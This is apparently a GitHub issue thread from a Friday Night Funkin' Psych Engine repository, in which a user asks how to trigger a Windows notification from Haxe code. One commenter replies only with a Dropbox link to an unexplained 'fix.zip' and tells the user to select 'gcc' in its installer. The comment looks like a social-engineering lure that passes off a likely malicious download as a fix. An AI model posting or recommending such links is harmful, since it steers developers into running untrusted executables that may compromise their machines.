### ISSUE TITLE
Haxe notification

### ISSUE THREAD

**Issue by Your-Local-LordXSimp** [ShadowMario/FNF-PsychEngine#15424]
### What is your question?

How do I make a notification appear when you open the game a 2nd time and onward in Haxe?
This is the code I copied from GameBanana.

`switch (SONG.song.toLowerCase())

{

    case '[your song here]':

              switch(curStep)

              {

                    case [step here]:

                           PlatformUtil.sendWindowsNotification("title here", "message here");

              }

}`

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Your-Local-LordXSimp** [comment]
It gives me an error when I click on the link.
